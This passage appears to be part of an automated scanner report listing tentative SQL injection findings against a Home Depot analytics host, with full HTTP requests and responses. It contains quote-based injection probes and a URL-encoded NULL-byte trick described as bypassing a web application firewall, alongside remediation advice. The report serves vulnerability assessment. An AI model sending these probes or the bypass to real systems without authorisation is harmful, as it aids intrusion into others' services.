The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /b/ss/homedepot%00'/1/H.22.1/s15357372987793?AQB=1&ndh=1&t=16%2F5%2F2011%206%3A55%3A30%204%20300&ce=UTF-8&ns=homedepot&g=about%3Ablank&cc=USD&c16=Refinements%7CProducts%7CIn%20Store&c35=undefined&s=1920x1200&c=32&j=1.5&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&pe=lnk_e&pev1=http%3A%2F%2Fwww.homedepotgardenclub.com%2FHome.aspx&pid=about%3Ablank&oid=Flyout-http%3A%2F%2Fwww.homedepotgardenclub.com%2FHome.aspx%3F&oidt=1&ot=A&oi=1&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: wasc.homedepot.com
Cookie: s_vi=[CS]v1|26FCF56B051D3BA1-60000102200313B4[CE]; 40M3=CT-2

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 12:24:13 GMT
Server: Omniture DC/2.0.0
Content-Length: 410
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss/homedepot was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss/homedepot%00''/1/H.22.1/s15357372987793?AQB=1&ndh=1&t=16%2F5%2F2011%206%3A55%3A30%204%20300&ce=UTF-8&ns=homedepot&g=about%3Ablank&cc=USD&c16=Refinements%7CProducts%7CIn%20Store&c35=undefined&s=1920x1200&c=32&j=1.5&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&pe=lnk_e&pev1=http%3A%2F%2Fwww.homedepotgardenclub.com%2FHome.aspx&pid=about%3Ablank&oid=Flyout-http%3A%2F%2Fwww.homedepotgardenclub.com%2FHome.aspx%3F&oidt=1&ot=A&oi=1&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: wasc.homedepot.com
Cookie: s_vi=[CS]v1|26FCF56B051D3BA1-60000102200313B4[CE]; 40M3=CT-2

Response 2

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 12:24:13 GMT
Server: Omniture DC/2.0.0
xserver: www276
Content-Length: 0
Content-Type: text/html


1.49. http://wasc.homedepot.com/b/ss/homedepot/1/H.22.1/s15506593697366 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://wasc.homedepot.com
Path:   /b/ss/homedepot/1/H.22.1/s15506593697366

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /b%00'/ss/homedepot/1/H.22.1/s15506593697366?AQB=1&ndh=1&t=16%2F5%2F2011%206%3A58%3A33%204%20300&ce=UTF-8&ns=homedepot&g=about%3Ablank&cc=USD&c16=Refinements%7CProducts%7CIn%20Store&c35=undefined&s=1920x1200&c=32&j=1.5&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&pe=lnk_e&pev1=http%3A%2F%2Fwww.homedepotgardenclub.com%2FHome.aspx&pid=about%3Ablank&oid=Flyout-http%3A%2F%2Fwww.homedepotgardenclub.com%2FHome.aspx%3F&oidt=1&ot=A&oi=1&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: wasc.homedepot.com
Cookie: s_vi=[CS]v1|26FCF56B051D3BA1-60000102200313B4[CE]; 40M3=CT-2

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 12:35:55 GMT
Server: Omniture DC/2.0.0
Content-Length: 397
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b%00''/ss/homedepot/1/H.22.1/s15506593697366?AQB=1&ndh=1&t=16%2F5%2F2011%206%3A58%3A33%204%20300&ce=UTF-8&ns=homedepot&g=about%3Ablank&cc=USD&c16=Refinements%7CProducts%7CIn%20Store&c35=undefined&s=1920x1200&c=32&j=1.5&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&pe=lnk_e&pev1=http%3A%2F%2Fwww.homedepotgardenclub.com%2FHome.aspx&pid=about%3Ablank&oid=Flyout-http%3A%2F%2Fwww.homedepotgardenclub.com%2FHome.aspx%3F&oidt=1&ot=A&oi=1&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: wasc.homedepot.com
Cookie: s_vi=[CS]v1|26FCF56B051D3BA1-60000102200313B4[CE]; 40M3=CT-2

Response 2

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 12:35:55 GMT
Server: Omniture DC/2.0.0
xserver: www373
Content-Length: 0
Content-Type: text/html


1.50. http://wasc.homedepot.com/b/ss/homedepot/1/H.22.1/s15620280432453 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://wasc.homedepot.com
Path:   /b/ss/homedepot/1/H.22.1/s15620280432453

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /b'/ss/homedepot/1/H.22.1/s15620280432453?AQB=1&ndh=1&t=16%2F5%2F2011%206%3A55%3A52%204%20300&ce=UTF-8&ns=homedepot&g=about%3Ablank&cc=USD&c16=Refinements%7CProducts%7CIn%20Store&c35=undefined&s=1920x1200&c=32&j=1.5&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&pe=lnk_o&pev2=Refinements&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: wasc.homedepot.com
Cookie: s_vi=[CS]v1|26FCF56B051D3BA1-60000102200313B4[CE]; 40M3=CT-2

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 12:23:41 GMT
Server: Omniture DC/2.0.0
Content-Length: 436
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b'/ss/homedepot/1/H.22.1/s15620280432453 was not fou
...[SNIP]...
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b''/ss/homedepot/1/H.22.1/s15620280432453?AQB=1&ndh=1&t=16%2F5%2F2011%206%3A55%3A52%204%20300&ce=UTF-8&ns=homedepot&g=about%3Ablank&cc=USD&c16=Refinements%7CProducts%7CIn%20Store&c35=undefined&s=1920x1200&c=32&j=1.5&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&pe=lnk_o&pev2=Refinements&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: wasc.homedepot.com
Cookie: s_vi=[CS]v1|26FCF56B051D3BA1-60000102200313B4[CE]; 40M3=CT-2

Response 2

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 12:23:41 GMT
Server: Omniture DC/2.0.0
xserver: www440
Content-Length: 0
Content-Type: text/html


1.51. http://wasc.homedepot.com/b/ss/homedepot/1/H.22.1/s1593516894569 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://wasc.homedepot.com
Path:   /b/ss/homedepot/1/H.22.1/s1593516894569

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /b'/ss/homedepot/1/H.22.1/s1593516894569?AQB=1&ndh=1&t=16%2F5%2F2011%206%3A58%3A42%204%20300&ce=UTF-8&ns=homedepot&pageName=mostpopular&g=about%3Ablank&cc=USD&s=1920x1200&c=32&j=1.5&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&pe=lnk_e&pev1=http%3A%2F%2Fwww.homedepotgardenclub.com%2FHome.aspx&pid=mostpopular&pidt=1&oid=Flyout-http%3A%2F%2Fwww.homedepotgardenclub.com%2FHome.aspx%3F&oidt=1&ot=A&oi=1&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: wasc.homedepot.com
Cookie: s_vi=[CS]v1|26FCF56B051D3BA1-60000102200313B4[CE]; 40M3=CT-2

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 12:36:04 GMT
Server: Omniture DC/2.0.0
Content-Length: 435
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b'/ss/homedepot/1/H.22.1/s1593516894569 was not foun
...[SNIP]...
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b''/ss/homedepot/1/H.22.1/s1593516894569?AQB=1&ndh=1&t=16%2F5%2F2011%206%3A58%3A42%204%20300&ce=UTF-8&ns=homedepot&pageName=mostpopular&g=about%3Ablank&cc=USD&s=1920x1200&c=32&j=1.5&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&pe=lnk_e&pev1=http%3A%2F%2Fwww.homedepotgardenclub.com%2FHome.aspx&pid=mostpopular&pidt=1&oid=Flyout-http%3A%2F%2Fwww.homedepotgardenclub.com%2FHome.aspx%3F&oidt=1&ot=A&oi=1&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: wasc.homedepot.com
Cookie: s_vi=[CS]v1|26FCF56B051D3BA1-60000102200313B4[CE]; 40M3=CT-2

Response 2

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 12:36:05 GMT
Server: Omniture DC/2.0.0
xserver: www440
Content-Length: 0
Content-Type: text/html


1.52. http://wasc.homedepot.com/b/ss/homedepot/1/H.22.1/s1593516894569 [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://wasc.homedepot.com
Path:   /b/ss/homedepot/1/H.22.1/s1593516894569

Issue detail

The REST URL parameter 6 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 6, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /b/ss/homedepot/1/H.22.1/s1593516894569%00'?AQB=1&ndh=1&t=16%2F5%2F2011%206%3A58%3A42%204%20300&ce=UTF-8&ns=homedepot&pageName=mostpopular&g=about%3Ablank&cc=USD&s=1920x1200&c=32&j=1.5&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&pe=lnk_e&pev1=http%3A%2F%2Fwww.homedepotgardenclub.com%2FHome.aspx&pid=mostpopular&pidt=1&oid=Flyout-http%3A%2F%2Fwww.homedepotgardenclub.com%2FHome.aspx%3F&oidt=1&ot=A&oi=1&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: wasc.homedepot.com
Cookie: s_vi=[CS]v1|26FCF56B051D3BA1-60000102200313B4[CE]; 40M3=CT-2

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 12:36:56 GMT
Server: Omniture DC/2.0.0
Content-Length: 434
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss/homedepot/1/H.22.1/s1593516894569 was not found
...[SNIP]...
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss/homedepot/1/H.22.1/s1593516894569%00''?AQB=1&ndh=1&t=16%2F5%2F2011%206%3A58%3A42%204%20300&ce=UTF-8&ns=homedepot&pageName=mostpopular&g=about%3Ablank&cc=USD&s=1920x1200&c=32&j=1.5&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&pe=lnk_e&pev1=http%3A%2F%2Fwww.homedepotgardenclub.com%2FHome.aspx&pid=mostpopular&pidt=1&oid=Flyout-http%3A%2F%2Fwww.homedepotgardenclub.com%2FHome.aspx%3F&oidt=1&ot=A&oi=1&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: wasc.homedepot.com
Cookie: s_vi=[CS]v1|26FCF56B051D3BA1-60000102200313B4[CE]; 40M3=CT-2

Response 2

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 12:36:56 GMT
Server: Omniture DC/2.0.0
xserver: www369
Content-Length: 0
Content-Type: text/html


1.53. http://wasc.homedepot.com/b/ss/homedepot/1/H.22.1/s16203244941575 [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://wasc.homedepot.com
Path:   /b/ss/homedepot/1/H.22.1/s16203244941575

Issue detail

The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 5, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /b/ss/homedepot/1/H.22.1%00'/s16203244941575?AQB=1&ndh=1&t=16%2F5%2F2011%206%3A40%3A58%204%20300&ce=UTF-8&ns=homedepot&pageName=mostpopular&g=about%3Ablank&cc=USD&s=1920x1200&c=32&j=1.5&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&pe=lnk_e&pev1=http%3A%2F%2Fwww.homedepotgardenclub.com%2FHome.aspx&pid=mostpopular&pidt=1&oid=Flyout-http%3A%2F%2Fwww.homedepotgardenclub.com%2FHome.aspx%3F&oidt=1&ot=A&oi=1&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: wasc.homedepot.com
Cookie: s_vi=[CS]v1|26FCF56B051D3BA1-60000102200313B4[CE]; 40M3=CT-2

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 11:50:32 GMT
Server: Omniture DC/2.0.0
Content-Length: 419
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss/homedepot/1/H.22.1 was not found on this server
...[SNIP]...
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss/homedepot/1/H.22.1%00''/s16203244941575?AQB=1&ndh=1&t=16%2F5%2F2011%206%3A40%3A58%204%20300&ce=UTF-8&ns=homedepot&pageName=mostpopular&g=about%3Ablank&cc=USD&s=1920x1200&c=32&j=1.5&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&pe=lnk_e&pev1=http%3A%2F%2Fwww.homedepotgardenclub.com%2FHome.aspx&pid=mostpopular&pidt=1&oid=Flyout-http%3A%2F%2Fwww.homedepotgardenclub.com%2FHome.aspx%3F&oidt=1&ot=A&oi=1&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: wasc.homedepot.com
Cookie: s_vi=[CS]v1|26FCF56B051D3BA1-60000102200313B4[CE]; 40M3=CT-2

Response 2

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 11:50:32 GMT
Server: Omniture DC/2.0.0
xserver: www276
Content-Length: 0
Content-Type: text/html


1.54. http://wasc.homedepot.com/b/ss/homedepot/1/H.22.1/s16457054631772 [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://wasc.homedepot.com
Path:   /b/ss/homedepot/1/H.22.1/s16457054631772

Issue detail

The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 5, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /b/ss/homedepot/1/H.22.1%00'/s16457054631772?AQB=1&ndh=1&t=16%2F5%2F2011%206%3A39%3A5%204%20300&ce=UTF-8&ns=homedepot&g=about%3Ablank&cc=USD&ch=errorPage&pageType=errorPage&events=event10&v4=direct&c27=Oops!%20The%20page%20you%20have%20requested%20cannot%20be%20found.&c28=Navigation&s=1920x1200&c=32&j=1.5&v=Y&k=N&bw=1&bh=1&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: wasc.homedepot.com
Cookie: s_vi=[CS]v1|26FCF56B051D3BA1-60000102200313B4[CE]; 40M3=CT-2

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 11:47:20 GMT
Server: Omniture DC/2.0.0
Content-Length: 419
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss/homedepot/1/H.22.1 was not found on this server
...[SNIP]...
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss/homedepot/1/H.22.1%00''/s16457054631772?AQB=1&ndh=1&t=16%2F5%2F2011%206%3A39%3A5%204%20300&ce=UTF-8&ns=homedepot&g=about%3Ablank&cc=USD&ch=errorPage&pageType=errorPage&events=event10&v4=direct&c27=Oops!%20The%20page%20you%20have%20requested%20cannot%20be%20found.&c28=Navigation&s=1920x1200&c=32&j=1.5&v=Y&k=N&bw=1&bh=1&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: wasc.homedepot.com
Cookie: s_vi=[CS]v1|26FCF56B051D3BA1-60000102200313B4[CE]; 40M3=CT-2

Response 2

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 11:47:20 GMT
Server: Omniture DC/2.0.0
xserver: www373
Content-Length: 0
Content-Type: text/html


1.55. http://wasc.homedepot.com/b/ss/homedepot/1/H.22.1/s19969816370798 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://wasc.homedepot.com
Path:   /b/ss/homedepot/1/H.22.1/s19969816370798

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /b/ss/homedepot/1%00'/H.22.1/s19969816370798?AQB=1&ndh=1&t=16%2F5%2F2011%206%3A48%3A54%204%20300&ce=UTF-8&ns=homedepot&pageName=mostpopular&g=about%3Ablank&cc=USD&s=1920x1200&c=32&j=1.5&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&pe=lnk_e&pev1=http%3A%2F%2Fwww.homedepotgardenclub.com%2FHome.aspx&pid=mostpopular&pidt=1&oid=Flyout-http%3A%2F%2Fwww.homedepotgardenclub.com%2FHome.aspx%3F&oidt=1&ot=A&oi=1&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: wasc.homedepot.com
Cookie: s_vi=[CS]v1|26FCF56B051D3BA1-60000102200313B4[CE]; 40M3=CT-2

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 12:05:25 GMT
Server: Omniture DC/2.0.0
Content-Length: 412
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss/homedepot/1 was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss/homedepot/1%00''/H.22.1/s19969816370798?AQB=1&ndh=1&t=16%2F5%2F2011%206%3A48%3A54%204%20300&ce=UTF-8&ns=homedepot&pageName=mostpopular&g=about%3Ablank&cc=USD&s=1920x1200&c=32&j=1.5&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&pe=lnk_e&pev1=http%3A%2F%2Fwww.homedepotgardenclub.com%2FHome.aspx&pid=mostpopular&pidt=1&oid=Flyout-http%3A%2F%2Fwww.homedepotgardenclub.com%2FHome.aspx%3F&oidt=1&ot=A&oi=1&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: wasc.homedepot.com
Cookie: s_vi=[CS]v1|26FCF56B051D3BA1-60000102200313B4[CE]; 40M3=CT-2

Response 2

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 12:05:25 GMT
Server: Omniture DC/2.0.0
xserver: www434
Content-Length: 0
Content-Type: text/html


1.56. http://wasc.homedepot.com/b/ss/homedepot/1/H.22.1/s23837734712508 [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://wasc.homedepot.com
Path:   /b/ss/homedepot/1/H.22.1/s23837734712508

Issue detail

The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 5, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

